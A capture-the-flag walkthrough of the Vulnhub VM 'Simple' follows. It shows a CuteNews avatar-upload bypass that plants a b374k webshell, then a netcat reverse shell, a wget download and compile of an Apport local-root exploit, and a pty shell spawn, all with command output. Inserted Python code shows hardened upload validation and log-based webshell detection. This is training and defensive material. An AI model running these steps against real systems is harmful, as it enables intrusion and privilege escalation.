BNE0x03 - Simple Writeup

This time, we are doing bull's vm Simple.

First things first, we nmap the host.

[email protected]:~# nmap -A -T4 -sV -p- -v

Starting Nmap 7.12 ( ) at 2016-05-09 14:44 EEST
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Initiating ARP Ping Scan at 14:44
Scanning [1 port]
Completed ARP Ping Scan at 14:44, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:44
Completed Parallel DNS resolution of 1 host. at 14:44, 0.00s elapsed
Initiating SYN Stealth Scan at 14:44
Scanning simple.lan ( [65535 ports]
Discovered open port 80/tcp on
Completed SYN Stealth Scan at 14:44, 17.69s elapsed (65535 total ports)
Initiating Service scan at 14:44
Scanning 1 service on simple.lan (
Completed Service scan at 14:44, 6.03s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against simple.lan (
NSE: Script scanning
Initiating NSE at 14:44
Completed NSE at 14:44, 0.36s elapsed
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Nmap scan report for simple.lan (
Host is up (0.0023s latency).
Not shown: 65534 closed ports
80/tcp open  http    Apache httpd 2.4.7
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Index of /
MAC Address: 08:00:27:60:21:5C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.182 days (since Mon May  9 10:23:09 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host:

1   2.33 ms simple.lan (

NSE: Script Post-scanning.
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 28.97 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

Only port 80 is open, so let's see what's on it.

The site runs CuteNews v.2.0.3. We look for known vulnerabilities in that specific version on Exploit-DB.
There is indeed an Arbitrary File Upload vulnerability.

First, we register a new user.

Then, on the Personal Options page we need to replace the avatar with our webshell. We select a PHP file saved with a .jpg extension and, after the form has been submitted, edit the filename parameter in the POST request from .jpg to .php, which bypasses the client-side file check.

Upon submitting the edited post request, the notification says that the changes to the avatar have been made.

After the shell has been uploaded, we just need to navigate to uploads/avatar_<username>_<file>, in my case uploads/avatar_gknsb_shell.php.
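The bypass works because the server stores the file under whatever name the client submitted, so the extension check only ever ran in the browser. As an added example (not CuteNews code and not from the original writeup), here is that trusting pattern beside a hardened version in Python. The `uploads/avatar_<username>_<file>` layout is taken from the path above; the function names, the size limit and the signature table are assumptions made for this example.

```python
import os
import re
import secrets

# Magic-byte signatures for the only formats an avatar may be (constructed list for this example).
IMAGE_SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_AVATAR_BYTES = 256 * 1024   # assumed limit; avatars have no business being large
UPLOAD_DIR = "uploads"          # directory name as seen in the writeup's path


def vulnerable_target_path(username: str, submitted_name: str) -> str:
    """The 'before': the server reuses the client-supplied filename, extension included.
    A name ending in .php therefore lands in the web root as an executable script."""
    return os.path.join(UPLOAD_DIR, f"avatar_{username}_{submitted_name}")


def detect_image_type(data: bytes):
    """Return the canonical extension for what the bytes actually are, or None."""
    for ext, signatures in IMAGE_SIGNATURES.items():
        if any(data.startswith(sig) for sig in signatures):
            return ext
    return None


def hardened_target_path(username: str, submitted_name: str, data: bytes) -> str:
    """The 'after': nothing about the stored file depends on the submitted name."""
    if not re.fullmatch(r"[A-Za-z0-9_]{1,32}", username):
        raise ValueError("invalid username")
    if not data or len(data) > MAX_AVATAR_BYTES:
        raise ValueError("avatar size out of bounds")
    ext = detect_image_type(data)
    if ext is None:
        raise ValueError("content is not a supported image")
    # A file with a valid image header can still carry PHP further in (a polyglot); this
    # cheap heuristic catches the obvious case, re-encoding the image server-side is the
    # robust fix.
    if b"<?php" in data:
        raise ValueError("script tag embedded in image data")
    # Random name plus the detected extension: submitted_name is deliberately ignored.
    return os.path.join(UPLOAD_DIR, f"avatar_{username}_{secrets.token_hex(8)}.{ext}")


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16          # constructed, header only
    print(vulnerable_target_path("gknsb", "shell.php"))  # trusted name goes straight to disk
    print(hardened_target_path("gknsb", "shell.php", png))
    try:
        hardened_target_path("gknsb", "shell.jpg", b"<?php echo 1; ?>")
    except ValueError as exc:
        print("rejected:", exc)
```

Independently of the handler, the upload directory should not be served through the script engine at all (with mod_php, `php_admin_flag engine off` in a `<Directory>` block for it); then even a file that slips past validation is returned as bytes rather than executed.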

Time for local privilege escalation. I start enumerating the system through the b374k webshell.

/var/www/>uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

/var/www/>cat /etc/lsb-release

After some searching, and a few failed attempts with overlayfs exploits, I come across this Apport local root exploit on Exploit-DB.

To run an exploit that elevates our privileges we need to get out of the webshell and obtain a reverse shell instead. In b374k, I navigate to the Network tab and establish a reverse shell like so.

Before hitting the "run" button, I started a netcat listener locally on port 443. Now that the reverse shell is established, let's go through with the escalation.
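Everything up to the reverse shell went through the web server, so the access log holds the whole story: a profile POST, then repeated requests for a .php file under uploads/. As an added example (not part of the original writeup and not a CuteNews or b374k component), the Python below runs that detection over a few constructed Apache access log lines. The avatar path pattern comes from the writeup; the IP addresses, timestamps and the `opt=personal` profile endpoint are assumptions made for this example.

```python
import re
from collections import Counter
from datetime import datetime

# Apache common/combined log prefix: the fields this detection needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Anything under the avatar directory that the server would hand to a script engine.
EXEC_IN_UPLOADS = re.compile(r"^/uploads/[^?]*\.(php\d?|phtml|phar)(\?.*)?$", re.IGNORECASE)
# The profile page that accepts the avatar (endpoint is an assumption for this example).
PROFILE_POST = re.compile(r"^/index\.php\?.*opt=personal", re.IGNORECASE)

# Constructed sample lines, not the VM's real log, modelled on the writeup's
# uploads/avatar_<username>_<file> path.
SAMPLE_LOG = """\
192.168.56.1 - - [09/May/2016:14:50:01 +0300] "GET /index.php?mod=main HTTP/1.1" 200 5120
192.168.56.1 - - [09/May/2016:14:51:10 +0300] "POST /index.php?mod=main&opt=personal HTTP/1.1" 200 612
192.168.56.1 - - [09/May/2016:14:51:12 +0300] "GET /uploads/avatar_gknsb_shell.php HTTP/1.1" 200 8830
192.168.56.1 - - [09/May/2016:14:52:30 +0300] "POST /uploads/avatar_gknsb_shell.php HTTP/1.1" 200 1201
192.168.56.20 - - [09/May/2016:14:53:00 +0300] "GET /uploads/avatar_alice_face.jpg HTTP/1.1" 200 20480
192.168.56.1 - - [09/May/2016:14:55:41 +0300] "GET /uploads/avatar_gknsb_shell.php HTTP/1.1" 200 2330
"""


def parse_line(line):
    """Parse one access log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def script_hits(log_text):
    """Every request for a script-extension file under /uploads/, whatever the status:
    a 200 means user-supplied content was executed, anything else is still an attempt."""
    recs = (parse_line(line) for line in log_text.splitlines())
    return [r for r in recs if r and EXEC_IN_UPLOADS.match(r["path"])]


def hits_per_client(log_text):
    """Count script hits per (client, path); a webshell produces many hits on one path."""
    return Counter((r["ip"], r["path"].split("?")[0]) for r in script_hits(log_text))


def upload_then_execute(log_text, window_seconds=300):
    """Pair each profile POST with the first script hit from the same client inside the
    window: the upload-then-execute sequence the avatar bypass produces."""
    recs = [r for r in (parse_line(line) for line in log_text.splitlines()) if r]
    pairs = []
    for i, post in enumerate(recs):
        if post["method"] != "POST" or not PROFILE_POST.match(post["path"]):
            continue
        for later in recs[i + 1:]:
            if later["ip"] != post["ip"] or not EXEC_IN_UPLOADS.match(later["path"]):
                continue
            if (later["ts"] - post["ts"]).total_seconds() <= window_seconds:
                pairs.append((post["ip"], post["ts"], later["path"]))
            break
    return pairs


if __name__ == "__main__":
    for (ip, path), n in hits_per_client(SAMPLE_LOG).items():
        print(f"{ip} requested {path} {n} times")
    for ip, ts, path in upload_then_execute(SAMPLE_LOG):
        print(f"{ip}: profile POST at {ts:%H:%M:%S} followed by {path}")
```

The second check is the one worth alerting on: a legitimate avatar change is followed by requests for a .jpg or .png, never for a .php, so a single pairing is already high confidence.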

[email protected]:~# nc -lvv -p 443
listening on [any] 443 ...
connect to [] from simple.lan [] 54344
b374k shell : connected
/bin/sh: 0: can't access tty; job control turned off
--2016-05-09 08:31:57--
Resolving (
Connecting to (||:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5216 (5.1K) [application/txt]
Saving to: '36746'

     0K .....                                                 100%  155M=0s

2016-05-09 08:31:58 (155 MB/s) - '36746' saved [5216/5216]

/tmp>mv 36746 exploit.c
/tmp>gcc -o sploit exploit.c -static
exploit.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
 # warning this file must be compiled with -static
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)

At this point our job is almost done. What is left is to spawn an interactive shell, and go grab the flag.

uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/tmp# cd /root/  
cd /root/
[email protected]:/root# ls -l
ls -l
total 4
-rw------- 1 root root 52 Sep 21  2015 flag.txt
[email protected]:/root# cat flag.txt
cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
[email protected]:/root#

That's it. Thanks a lot to RobertWinkel for creating the vm and Vulnhub for hosting it. Cheers!